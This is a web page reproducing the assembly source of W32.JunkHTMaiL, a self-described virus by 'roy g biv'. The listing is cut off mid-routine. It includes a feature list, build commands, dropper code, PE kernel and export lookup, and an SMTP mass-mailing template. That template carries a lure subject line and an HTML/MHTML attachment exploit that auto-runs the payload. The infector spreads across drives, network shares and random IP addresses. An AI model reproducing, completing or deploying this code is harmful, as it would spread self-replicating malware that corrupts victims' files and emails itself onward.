📄 29a-7.004
字号:
comment ;)
W32.JunkHTMaiL by roy g biv (thanks to RT Fishel for previous contribution)
some of its features:
- parasitic resident (own process) infector of PE exe (but not looking at suffix)
- infects files in all directories on all fixed and network drives and network shares
- directory traversal is linked-list instead of recursive to reduce stack size
- enumerates shares on local network and also random IP addresses
- reloc section inserter/last section appender
- runs as service in NT/2000/XP and service process in 9x/Me
- hooks all executable shell\open\command values
- slow mailer using polymorphic mail headers and self-executing HTML
- auto function type selection (Unicode under NT/2000/XP, ANSI under 9x/Me)
- uses CRCs instead of API names
- uses SEH for common code exit
- section attributes are never altered (virus is self-modifying but runs in writable memory)
- no infect files with data outside of image (eg self-extractors)
- infected files are padded by random amounts to confuse tail scanners
- uses SEH walker to find kernel address (no hard-coded addresses)
- correct file checksum without using imagehlp.dll :) 100% correct algorithm
- plus some new code optimisations that were never seen before W32.EfishNC :)
yes, just a W32.JunkMail remake with a different exploit
---
optimisation tip: Windows appends ".dll" automatically, so this works:
push "cfs"
push esp
call LoadLibraryA
---
to build this thing:
tasm
----
tasm32 /ml /m3 junkhtml
tlink32 /B:400000 /x junkhtml,,,import32
Virus is not self-modifying, so no need to alter section attributes
---
We're in the middle of a phase transition:
a butterfly flapping its wings at
just the right moment could
cause a storm to happen.
-I'm trying to understand-
I'm at a moment in my life-
I don't know where to flap my wings.
(Danny Hillis)
(;
.486
.model flat
extern GlobalAlloc:proc
extern CreateFileA:proc
extern GetFileSize:proc
extern GetModuleFileNameA:proc
extern ReadFile:proc
extern WriteFile:proc
extern CloseHandle:proc
extern GlobalFree:proc
extern GetCurrentProcess:proc
extern WriteProcessMemory:proc
extern MessageBoxA:proc
extern ExitProcess:proc
.data
;to alter the text here, set compress_only to not-zero then run
;in that case, the compressed text is written to a file only
compress_only equ 0
ife compress_only
;must be reverse alphabetical order because they are stored on stack
;API names are not present in replications, only in dropper
expnames db "WriteFile" , 0
db "WinExec" , 0
db "SetFileAttributesA" , 0
db "MoveFileA" , 0
db "LoadLibraryA" , 0
db "GlobalFree" , 0
db "GlobalAlloc" , 0
db "GetWindowsDirectoryA", 0
db "GetTickCount" , 0
db "GetTempFileNameA" , 0
db "GetFileAttributesA" , 0
db "GetCurrentProcess" , 0
db "DeleteFileA" , 0
db "CreateFileA" , 0
db "CloseHandle" , 0
regnames db "RegSetValueA" , 0
db "OpenSCManagerA" , 0
db "CreateServiceA" , 0
db "CloseServiceHandle", 0
exenames db "LoadLibraryA" , 0
db "GlobalAlloc" , 0
db "GetVersion" , 0
db "GetTickCount" , 0
db "GetStartupInfoW", 0
db "GetStartupInfoA", 0
db "GetCommandLineW", 0
db "GetCommandLineA", 0
db "ExitProcess" , 0
db "CreateProcessW" , 0
db "CreateProcessA" , 0
usrnames db "CharNextW", 0
db "CharNextA", 0
svcnames db "StartServiceCtrlDispatcherA", 0
krnnames db "lstrlenW" , 0
db "lstrcpyW" , 0
db "lstrcatW" , 0
db "UnmapViewOfFile" , 0
db "Sleep" , 0
db "SetFileTime" , 0
db "SetFileAttributesW" , 0
db "SetFileAttributesA" , 0
db "SetCurrentDirectoryW" , 0
db "SetCurrentDirectoryA" , 0
db "ReadFile" , 0
db "MultiByteToWideChar" , 0
db "MapViewOfFile" , 0
db "LoadLibraryA" , 0
db "GlobalFree" , 0
db "GlobalAlloc" , 0
db "GetVersion" , 0
db "GetTickCount" , 0
db "GetModuleFileNameA" , 0
db "GetFullPathNameW" , 0
db "GetFullPathNameA" , 0
db "GetFileSize" , 0
db "GetDriveTypeA" , 0
db "FindNextFileW" , 0
db "FindNextFileA" , 0
db "FindFirstFileW" , 0
db "FindFirstFileA" , 0
db "FindClose" , 0
db "CreateThread" , 0
db "CreateFileW" , 0
db "CreateFileMappingA" , 0
db "CreateFileA" , 0
db "CloseHandle" , 0
sfcnames db "SfcIsFileProtected", 0
ws2names db "socket" , 0
db "send" , 0
db "gethostbyname", 0
db "connect" , 0
db "WSAStartup" , 0
netnames db "WNetOpenEnumW" , 0
db "WNetOpenEnumA" , 0
db "WNetEnumResourceW", 0
db "WNetEnumResourceA", 0
db "WNetCloseEnum" , 0
ip9xnames db "NetShareEnum", 0
ipntnames db "NetShareEnum" , 0
db "NetApiBufferFree", 0
endif
;only 0dh is required for new line, since 0ah is appended by decompressor
user1 equ ' '
user2 equ '/'
user3 equ ':' ;the three most frequent characters
smtp1 db offset smtp2 - offset $ - 2, "HELO ", 0
smtp2 db offset smtp3 - offset $ - 2, "MAIL FROM:<>", 0dh, 0
smtp3 db offset smtp4 - offset $ - 2, "RCPT TO:", 0
smtp4 db offset header1 - offset $ - 2, "DATA", 0dh, 0
header1 db offset header2 - offset $ - 2, "FROM: ", 0
header2 db offset header31 - offset $ - 2, "SUBJECT: Wanna see a e-mail exploit?", 0
header31 db offset header32 - offset $ - 2, 0dh, "MIME-VERSION:", 0
header32 db offset part11 - offset $ - 2, "1.0", 0
part11 db offset part12 - offset $ - 2, "CONTENT-TYPE:", 0
part12 db offset part13 - offset $ - 2, "MULTIPART/MIXED;", 0
part13 db offset body1 - offset $ - 2, " BOUNDARY=", 0
body1 db offset body2 - offset $ - 1
db 0dh, "Just click the attachment", 0dh
body2 db offset body3 - offset $ - 1
db "If the attachment is blocked by Outlook 2002 then see", 0dh
body3 db offset body4 - offset $ - 1
db "http://support.microsoft.com/support/kb/articles/q290/4/97.asp", 0dh
body4 db 0
part21 db offset part22 - offset $ - 2, "TEXT/PLAIN;", 0
part22 db offset part23 - offset $ - 2, " NAME=EMAIL.HTM", 0
part23 db offset part24 - offset $ - 2, 0dh, "CONTENT-TRANSFER-ENCODING:", 0
part24 db offset part25 - offset $ - 2, "QUOTED-PRINTABLE", 0
part25 db offset part26 - offset $ - 2, 0dh, "CONTENT-DISPOSITION:", 0
part26 db offset part27 - offset $ - 2, "ATTACHMENT", 0
part27 db offset part28 - offset $ - 2, "CONTENT-LOCATION:FILE:///.EXE", 0
part28 db offset part31 - offset $ - 2, "BASE64", 0
;just a bit too long for a single line... unless you remove the "moveBy"...
part31 db offset part32 - offset $ - 1, 0dh, "<SCRIPT>moveBy(9999);with(document)write(", 22h, "<OBJECT CLASSID='CLSID:1BADDEED'"
part32 db offset part41 - offset $ - 2, "CODEBASE='MHTML:", 22h, "+URL+", 22h, "!FILE:///.EXE'></OBJECT>", 22h, ")</SCRIPT>", 0
part41 db offset part42 - offset $ - 2, ".", 0dh, 0
part42 db offset part43 - offset $ - 2, "QUIT", 0dh, 0
part43 equ $
include junkhtml.inc
txttitle db "JunkHTMaiL", 0
if compress_only
txtbody db "compress done", 0
else
txtbody db "running...", 0
patch_host label near
pop ecx
push ecx
call $ + 5
pop eax
add eax, offset host_patch - offset $ + 6
sub ecx, eax
push ecx
mov eax, esp
xor edi, edi
push edi
push 4
push eax
push offset host_patch + 1
push esi
call WriteProcessMemory
jmp junkhtml_inf
;-----------------------------------------------------------------------------
;everything before this point is dropper code
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
;virus code begins here in infected files
;-----------------------------------------------------------------------------
junkhtml_inf proc near
pushad
call walk_seh
;-----------------------------------------------------------------------------
;API CRC table, null terminated
;-----------------------------------------------------------------------------
expcrcbegin label near ;place < 80h bytes from call for smaller code
dd (expcrc_count + 1) dup (0)
expcrcend label near
dd offset drop_exp - offset expcrcend + 4
db "JunkHTMaiL - roy g biv" ;spam just got harder to remove ;)
walk_seh label near
xor esi, esi
lods dword ptr fs:[esi]
inc eax
seh_loop label near
dec eax
xchg esi, eax
lods dword ptr [esi]
inc eax
jne seh_loop
lods dword ptr [esi]
;-----------------------------------------------------------------------------
;moved label after some data because "e800000000" looks like virus code ;)
;-----------------------------------------------------------------------------
init_findmz label near
inc eax
xchg edi, eax
find_mzhdr label near
;-----------------------------------------------------------------------------
;do not use hard-coded kernel address values because it is not portable
;Microsoft used all different values for 95, 98, NT, 2000, Me, XP
;they will maybe change again for every new release
;-----------------------------------------------------------------------------
dec edi ;sub 64kb
xor di, di ;64kb align
call is_pehdr
jne find_mzhdr
mov ebx, edi
pop edi
;-----------------------------------------------------------------------------
;parse export table
;-----------------------------------------------------------------------------
mov esi, dword ptr [esi + pehdr.peexport.dirrva - pehdr.pecoff]
lea esi, dword ptr [ebx + esi + peexp.expordbase]
lods dword ptr [esi] ;Ordinal Base
lea ebp, dword ptr [eax * 2 + ebx]
lods dword ptr [esi]
lods dword ptr [esi]
lods dword ptr [esi] ;Export Address Table RVA
lea edx, dword ptr [ebx + eax]
lods dword ptr [esi] ;Name Pointer Table RVA
add ebp, dword ptr [esi] ;Ordinal Table RVA
lea ecx, dword ptr [ebx + eax]
mov esi, ecx
push_export label near
push ecx
get_export label near
lods dword ptr [esi]
push ebx
add ebx, eax ;Name Pointer VA
or eax, -1
crc_outer label near
xor al, byte ptr [ebx]
push 8
pop ecx
crc_inner label near
add eax, eax
jnb crc_skip
xor eax, 4c11db7h ;use generator polymonial (see IEEE 802)
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -